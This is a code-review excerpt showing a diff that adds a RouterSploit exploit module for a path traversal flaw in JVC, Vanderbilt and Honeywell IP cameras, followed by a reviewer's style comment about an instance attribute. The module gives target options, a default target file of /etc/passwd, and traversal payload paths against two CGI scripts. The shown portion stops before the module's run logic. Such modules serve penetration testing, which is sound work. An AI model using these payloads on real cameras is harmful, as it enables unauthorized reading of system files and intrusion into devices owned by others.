routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py

```diff
@@ -0,0 +1,78 @@
+from routersploit import (
+    exploits,
+    print_error,
+    print_status,
+    print_info,
+    print_success,
+    http_request,
+    mute,
+    validators
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for JVC IP-Camera VN-T216VPRU, Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR and Honeywell IP-Camera HICC-1100PT
+    Path Traversal vulnerability. If target is vulnerable it is possible to read file from the filesystem.
+    """
+    __info__ = {
+        'name': 'JVC & Vanderbilt & Honeywell IP-Camera Path Traversal',
+        'description': 'Module exploits JVC IP-Camera VN-T216VPRU, Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR and Honeywell '
+                       'IP-Camera HICC-1100PT Path Traversal vulnerability. If target is vulnerable it is possible to read file '
+                       'from the filesystem.',
+        'authors': [
+            'Yakir Wizman',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/40281/',
+        ],
+        'devices': [
+            'JVC IP-Camera VN-T216VPRU'
+            'Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR',
+            'Honeywell IP-Camera HICC-1100PT'
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+
+    filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
+
+    resources = ["/cgi-bin/check.cgi?file=../../..{}",
+                 "/cgi-bin/chklogin.cgi?file=../../..{}"]
+    valid_resource = None
```

Comment:
`valid_resource` is clearly instance attribute. I think we should place that in the `__init__` method